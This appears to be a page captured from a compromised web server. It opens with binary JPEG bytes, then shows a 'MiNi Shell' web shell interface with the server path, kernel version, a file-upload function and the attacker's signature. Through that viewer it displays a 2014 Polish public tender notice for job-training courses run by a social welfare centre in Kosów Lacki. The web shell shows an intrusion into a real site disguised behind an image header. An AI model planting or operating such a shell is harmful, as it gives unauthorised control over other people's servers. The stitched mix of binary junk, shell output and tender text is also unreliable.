JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140411/124602-N-2014.html

<p class="kh_header"><b>Kosów Lacki: Zorganizowanie i przeprowadzenie usług szkoleniowych dla 11 osób klientów Miejsko-Gminnego Ośrodka Pomocy Społecznej w Kosowie Lackim Beneficjentów Ostatecznych uczestniczących w 2014 roku w projekcie systemowym Szansa na lepsze jutro-aktywizacja zawodowa na terenie Miasta i Gminy Kosów Lacki współfinansowanym ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 124602 - 2014; data zamieszczenia: 11.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Kościelna 22, 08-330 Kosów Lacki, woj. mazowieckie, tel. 25 7879627, faks 25 7879627.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie usług szkoleniowych dla 11 osób klientów Miejsko-Gminnego Ośrodka Pomocy Społecznej w Kosowie Lackim Beneficjentów Ostatecznych uczestniczących w 2014 roku w projekcie systemowym Szansa na lepsze jutro-aktywizacja zawodowa na terenie Miasta i Gminy Kosów Lacki współfinansowanym ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1.Przedmiotem zamówienia jestZorganizowanie i przeprowadzenie usług szkoleniowych dla 11 osób w tym1 osoby niepełnosprawnej z terenu Miasta i Gminy Kosów Lacki które są w wieku aktywności zawodowej beneficjentów pomocy społecznej uczestniczących w 2014 roku w projekcie systemowym Szansa na lepsze jutro aktywizacja zawodowa na terenie Miasta i Gminy Kosów Lacki współfinansowanym przez Unię Europejską w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII działanie 7.1 Rozwój i upowszechnianie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.składającej się z:1.Zajęć prowadzonych przez psychologa w grupie min 25 godzin i indywidualnie min 4 godziny dla 11 beneficjentów ostatecznych.2.Zajęć prowadzonych przez doradcę zawodowego w grupie min 25 godzin i indywidualnie min 4 godziny dla 11 beneficjentów ostatecznych.3.Konsultacji z lekarzem medycyny pracy.4.Szkoleń których celem jest nabycie teoretycznych i praktycznych umiejętności oraz uzyskanie uprawnień w niżej wymienionych zawodach.Wymagany czas szkolenia dla każdej ze specjalności zgodny z wymaganiami szkoleniowymi. Szkolenia powinny zakończyć się egzaminem:1)Prawo jazdy kat.B-4 osoby2)Prawo jazdy kat.C-2 osoby3)Kurs obsługi wózków widłowych znapędemsilnikowym -2 osoby4)Kurs komputerowy-2 osoby5)Kurs obsługi kasy fiskalnej- 3 osoby6)Kurs fryzjer stylista z elementami wizażu-1 osoba7)Kurs opiekun domowy-2 osoby8)Kurs obsługi koparko-ładowarki-3 osoby9)Kurs florystyki-1 osoba10)Kurs kucharz małej gastronomii-4 osoby11)Kurs kelner-barman-1 osoba12)Kurs obsługa programu magazynowego WF-MAG-1 osoba13)Kurs obsługi stacji paliw płynnych i gazowych LPG-1 osoba2.2. Termin wykonania zamówienia:Zamawiający wyznacza termin wykonania zamówienia:do dnia 30 listopada 2014 roku. 2.3. Szczegółowy opis przedmiotu zamówienia:Usługa szkoleniowa obejmuje 11 beneficjentów ostatecznych w tym 1 osobę niepełnosprawną zamieszkujących na terenie miasta i gminy Kosów Lacki.Miejsce realizacji-Kosów Lacki lub miejscowość oddalona do 60 km od miejsca zamieszkania beneficjentów ostatecznych.Wykonawca maobowiązek pokrycia kosztu zakupu biletu z miejsca zamieszkania beneficjentów ostatecznych do miejsca odbywania zajęć lub dostarczenia beneficjentów na zajęcia.Pomieszczenia zapewnia wykonawca-obowiązkiem Wykonawcy jest zapewnienie uczestnikom odpowiednich warunków szkolenia tj.w szczególności zapewnienie zaplecza socjalnego i sanitarnego zapewnienie odpowiedniego technicznego wyposażenia sali dydaktycznej.Zajęcia prowadzone przez psychologa w grupie min 25 godzin oraz indywidualnie min 4 godziny.Zamawiający wymaga aby wszyscy Beneficjenci Ostateczni uzyskali zaświadczenia o odbyciu treningu umiejętności psychospołecznych potwierdzone zaświadczeniami.Grupowy trening umiejętności społecznych ukierunkowany powinien być na rozwijanie takich umiejętności jak: asertywność komunikacja autoprezentacja metody radzenia sobie w trudnych sytuacjach dostrzeganie i eliminowanie błędów w postrzeganiu swoich szans na zatrudnienie podniesienie poziomu samooceny i poczucia własnej wartości.
Indywidualne konsultacje z psychologiem ukierunkowane powinny być na wsparcie 
w zakresie podnoszenia kompetencji życiowych radzenia sobie w trudnych sytuacjach życiowych umożliwienie powrotu do życia społecznego.Zajęcia prowadzone przez doradcę zawodowego-w grupie min 25 godzin oraz 
indywidualnie min 4 godziny.Określenie predyspozycji zawodowych  warsztaty aktywnego poszukiwania pracy napisanie listu motywacyjnego i CV.Zamawiający wymaga aby wszyscy Beneficjenci Ostateczni uzyskali zaświadczenia o odbyciu szkoleń z doradcą zawodowym potwierdzone zaświadczeniami.Dla wszystkich Beneficjentów Ostatecznych (11 osób) obowiązkowe jest przeprowadzenie badań z zakresu medycyny pracy oraz ubezpieczenie od następstw NW.Do wykonawcy organizującego szkolenia i kursy należy przygotowanie materiałów szkoleniowych. Przy realizacji szkoleń oraz kursów wymagane jest prowadzenie listy obecności i dziennika zajęć.Wykonawca przedstawi zamawiającemu harmonogram zajęć. Wykonawca ma obowiązekzapewnić pomieszczenia do prowadzenia zajęć oraz fachową kadrę przygotowaną do prowadzenia wymienionych kursów i szkoleń. Wymagane zagadnienia i wymiar zajęć teoretycznych i praktycznych:zgodnie ze szczegółowym programem kursu zawodowego przedstawionym Zleceniodawcy. Wykonawca ma obowiązek zapewnić posiłki podczas prowadzonych zajęć:   przerwa kawowa (kawa,herbata,ciastka),przerwa obiadowa (obiad w postaci drugiego dania wraz z surówką). Wykonawca prowadzi obsługę administracyjną w zakresie:obecność na zajęciach rozliczenie wydanych materiałów uczestnikom Projektu.Wykonawca przedstawi zamawiającemu w terminie  do 7 dni od daty zakończenia szkolenia następujące dokumenty:oryginały bądź potwierdzone za zgodność z oryginałem kopie zaświadczeń o ukończeniu szkolenia listy obecności na szkoleniu.Wykonawca ma obowiązek stosowania logo na wydawanych dokumentach:Unii Europejskiej Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał  Ludzki zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki wydanymi przez Departament Zarządzania Europejskim Funduszem Społecznym Ministerstwo Rozwoju Regionalnego Instytucja Zarządzająca Programem Operacyjnym Kapitał Ludzki z dnia 4 lutego 2009roku.Wykonawca ma obowiązek informowania beneficjentów że realizowana usługa jest finansowana z udziałem środków pochodzących z Unii Europejskiej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania jeśli udokumentuje, że jest wpisany do rejestru instytucji szkoleniowych prowadzonego zgodnie z siedzibą Wykonawcy.Ocena spełnienia kryterium nastąpi w oparciu o złożone dokumenty i oświadczenia w formule spełnia,nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie , jeżeli wykaże ,że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje usługi polegające na zorganizowaniu i przeprowadzeniu szkoleń i kursów zawodowych dla osób będących beneficjentami ośrodków pomocy społecznej zagrożonych wykluczeniem społecznym, przy czym w załączonym wykazie wskaże usługi szkoleniowe w których przeszkolono łącznie co najmniej 70 osób załączy do tych pozycji dowody potwierdzające, że usługi wykonano należycie. Dowody wykonawca składa zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2014r w sprawie dokumentów jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane ( Dz.U.z 2013, poz.231)Ocena spełnienia kryterium nastapi w oparciu o złożone dokumenty i oświadczenia w formule spełnia , nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje i nie ma szczególnych wymagań odnośnie potencjału technicznego Wykonawcy i uzna, że wykonawca spełnia warunek na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 ustawy Prawo zamówień publicznych będącego załącznikiem nr 2 do SIWZ. Ocena spełnienia kryterium nastapi w oparciu o złożone dokumenty i oświadczenia w formule spełnia, nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do realizacji przedmiotu zamówienia jeżeli oświadczy, że osoby które będą realizować przedmiot zamówienia posiadają odpowiednie przewidziane przepisami prawa kwalifikacje stosownie do rodzaju prowadzonych zajęć .Ocena spełnienia kryterium nastapi w oparciu o złożone dokumenty i oświadczenia w formule spełnia i nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej umożliwiającej realizację zamówienia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 ustawy Prawo zamówień publicznych Załącznik nr 2 do SIWZ. Ocena spełnienia kryterium nastapi w oparciu o złożone dokumenty i oświadczenia w formule spełnia, nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca ma obowiązek wskazać w wykazie głównym usług realizacją usług szkoleniowych, w których przeszkolono łącznie co najmniej 70 osób z podaniem wartości zamówień, przedmiotu zamówienia, dat realizacji i podmiotów na rzecz których zamówienia były wykonywane lub są wykonywane oraz załączy do tych pozycji dowody potwierdzające, że usługę wykonano należycie zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013r w sprawie dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013 poz.231) wzór wykazu stanowi załącznik nr 4 do SIWZ.;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oferta cenowa na formularzu zgodnie z załacznikiem nr1 do SIWZ 2. Parafowany projekt umowy 3. Oświadczenie o spełnianiu warunków udziału w postepowaniu określonym w art.22 ust.1 ustawy Prawo zamówień publicznych 4. Oświadczenie ,że osoby biorące udział w realizacji przedmiotu zamówienia posiadają odpowiednie kwalifikacje załącznik nr 7 do SiIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie zawodowe - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian w umowie. Zmiana umowy może być dokonana w granicach wyznaczonych przepisami ustawy PZP, w tym art.144 ustawy PZP, wyłącznie za zgodą obu stron, w formie pisemnej pod rygorem nieważności.13.2.Zmiany umowy mogą nastąpić w następujących przypadkach:
13.2.1.Zaistnienia omyłki pisarskiej lub rachunkowej.13.2.2.Zaistnienia siły wyższej mającej wpływ na realizację umowy.13.2.3.Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, w tym zmiany ustawowej stawki podatku VAT.13.2.4.Zaistnienia nowych okoliczności, niezależnych od Zamawiającego i Wykonawcy, uzasadniających zmiany terminów realizacji szkoleń.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kosowlacki.e-bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej 08-330 Kosów Lacki ul. Kościelna 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2014 godzina 10:00, miejsce: Miejsko-Gminny Ośrodek Pomocy Społecznej w Kosowie Lackim ul. Kościelna 22 i zaadresować: Miejsko-Gminny Ośrodek Pomocy Społecznej, 08-330 Kosów Lacki ul. Kościelna 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej - Europejskiego
Funduszu Społecznego w ramach programu Operacyjnego Kapitał Ludzki, Priorytet VII, Działanie 7.1, Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com